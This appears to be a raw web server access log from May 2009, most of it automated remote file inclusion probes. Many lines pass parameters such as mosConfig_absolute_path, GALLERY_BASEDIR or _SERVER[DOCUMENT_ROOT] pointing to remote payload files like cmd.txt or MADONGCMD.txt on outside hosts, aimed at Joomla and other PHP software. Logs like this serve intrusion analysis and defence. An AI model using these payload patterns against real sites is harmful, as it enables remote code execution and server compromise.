193.221.119.126 - - [12/May/2009:01:57:45 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:57:45 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:57:57 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:57:57 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:57:57 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.84.128.40 - - [12/May/2009:01:58:03 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.232.102.70 - - [12/May/2009:01:58:13 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:01:58:13 -0400] "GET /logs/access_log.Q108090700%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:01:58:13 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.72.114 - - [12/May/2009:01:58:28 -0400] "GET /logs/error_log.Q107081200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.126 - - [12/May/2009:01:58:32 -0400] "GET /logs/access_log.Q108052500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.128.40 - - [12/May/2009:01:58:48 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:58:48 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.232.102.70 - - [12/May/2009:01:58:52 -0400] "GET /logs/access_log.Q108101200%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.109.75.86 - - [12/May/2009:01:58:53 -0400] "GET /logs/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 221 "-" "Mozilla/5.0"
59.109.75.86 - - [12/May/2009:01:58:53 -0400] "GET /samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 216 "-" "Mozilla/5.0"
59.109.75.86 - - [12/May/2009:01:58:53 -0400] "GET /logs/access_log.Q109050700/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
88.84.128.40 - - [12/May/2009:01:58:57 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:59:00 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
58.227.193.198 - - [12/May/2009:01:59:04 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:01:59:04 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:01:59:04 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:01:59:12 -0400] "GET /logs/error_log.Q108061400/port.php?content=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.110.19.178 - - [12/May/2009:01:59:19 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:01:59:19 -0400] "GET /logs/error_log.Q108102500//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:01:59:19 -0400] "GET //index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:01:59:33 -0400] "GET /logs/access_log.Q108102500//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.249.72.114 - - [12/May/2009:01:59:59 -0400] "GET /logs/error_log.Q108100400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.199.222.19 - - [12/May/2009:02:00:03 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:00:08 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:00:08 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:00:08 -0400] "GET /logs/access_log.Q109011800////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:02:00:15 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
63.230.8.4 - - [12/May/2009:02:00:16 -0400] "GET /errors.php?error=http://www.sysweb.it/gif/cmd.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
218.150.79.146 - - [12/May/2009:02:00:21 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:21 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:00:24 -0400] "GET /logs/error_log.Q109031400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.79.146 - - [12/May/2009:02:00:27 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:27 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:00:27 -0400] "GET /logs/access_log.Q109031300////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:29 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:29 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:36 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:02:00:36 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:06 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:06 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:06 -0400] "GET /logs/error_log.Q108071100%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:07 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:07 -0400] "GET /logs/error_log.Q108071100%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:07 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:08 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:08 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:08 -0400] "GET /logs/error_log.Q108071100%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:09 -0400] "GET /logs/error_log.Q108111700%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:09 -0400] "GET /logs/error_log.Q108111700%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:14 -0400] "GET /logs/error_log.Q108111700%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:42 -0400] "GET /logs/error_log.Q108071100/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:42 -0400] "GET /logs/error_log.Q108111700/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:43 -0400] "GET /logs/error_log.Q108071100/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:43 -0400] "GET /logs/error_log.Q108111700/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:46 -0400] "GET /logs/error_log.Q108071100/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.89.33.167 - - [12/May/2009:02:01:46 -0400] "GET /logs/error_log.Q108111700/mods/business_functions.php?GALLERY_BASEDIR=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:02:02:02 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:02:02:17 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:02:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [12/May/2009:02:02:50 -0400] "GET /logs/access_log.Q109050800%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.125.64.38 - - [12/May/2009:02:03:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.165.73.157 - - [12/May/2009:02:03:36 -0400] "GET //include/lib.inc.php?site_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:03:36 -0400] "GET /logs/access_log.Q108083100//include/lib.inc.php?site_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:02:03:36 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
66.232.102.70 - - [12/May/2009:02:04:14 -0400] "GET /logs/access_log.Q108111600%20%20//citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:04:14 -0400] "GET /logs//citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:04:14 -0400] "GET /logs/access_log.Q109012800%20%20//citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:04:14 -0400] "GET //citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
210.118.194.200 - - [12/May/2009:02:04:15 -0400] "GET //index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:02:04:15 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:02:04:15 -0400] "GET /logs/error_log.Q108102500//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
190.144.44.36 - - [12/May/2009:02:04:24 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:02:04:25 -0400] "GET /logs/access_log.Q108092900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:02:04:25 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:02:04:29 -0400] "GET /logs/access_log.Q108122100//include/lib.inc.php?site_path=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
210.118.194.200 - - [12/May/2009:02:04:37 -0400] "GET /logs/access_log.Q108102500//index.php?DOCUMENT_ROOT=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
58.227.193.198 - - [12/May/2009:02:04:50 -0400] "GET /logs/access_log.Q109050300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:05:53 -0400] "GET /logs/access_log.Q109012800//citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:05:53 -0400] "GET /logs/access_log.Q108111600//citywriter/head.php?path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:07:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [12/May/2009:02:07:28 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:28 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:28 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:30 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:30 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:30 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:31 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:31 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:07:31 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:02:09:03 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:02:09:03 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:02:09:03 -0400] "GET ///skin/zero_vote/setup.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.249.36.194 - - [12/May/2009:02:09:06 -0400] "GET /logs//appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.249.36.194 - - [12/May/2009:02:09:06 -0400] "GET //appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.249.36.194 - - [12/May/2009:02:09:06 -0400] "GET /logs/access_log.Q108061400//appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:02:09:13 -0400] "GET /logs/access_log.Q109041900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.144.44.36 - - [12/May/2009:02:09:33 -0400] "GET /logs/access_log.Q108092900%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:02:10:17 -0400] "GET /logs/access_log.Q109042600//?_SERVER[DOCUMENT_ROOT]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:02:10:34 -0400] "GET /logs/access_log.Q109010100/components/com_forum/download.php?phpbb_root_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:02:10:34 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:02:10:34 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:02:10:39 -0400] "GET /logs/access_log.Q108090400//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:02:10:55 -0400] "GET /logs/access_log.Q108110900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:11:00 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:11:00 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
222.239.227.155 - - [12/May/2009:02:11:10 -0400] "GET /logs/access_log.Q108102500/components/com_forum/download.php?phpbb_root_path=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:12:12 -0400] "GET /logs/access_log.Q109030500//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:12:12 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:12:12 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.232.102.70 - - [12/May/2009:02:12:14 -0400] "GET /logs/access_log.Q108073000//faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:02:12:23 -0400] "GET /logs/access_log.Q109012500//faqsupport/samplefaqsupport.php?path[docroot]=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:12:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [12/May/2009:02:13:16 -0400] "GET /logs/access_log.Q109011800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
122.116.178.20 - - [12/May/2009:02:13:33 -0400] "GET /logs/access_log.Q109031300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:02:14:25 -0400] "GET /logs/access_log.Q109042600%20%20//?_SERVER[DOCUMENT_ROOT]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
12.160.210.100 - - [12/May/2009:02:16:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
12.160.210.100 - - [12/May/2009:02:16:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
12.160.210.100 - - [12/May/2009:02:16:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
218.249.36.194 - - [12/May/2009:02:16:59 -0400] "GET //appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.249.36.194 - - [12/May/2009:02:16:59 -0400] "GET /logs/access_log.Q108061400//appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [12/May/2009:02:16:59 -0400] "GET /logs//appserv/main.php?appserv_root=http://cuekh-bubekh.ucoz.com/id1.txt?????? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:02:17:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
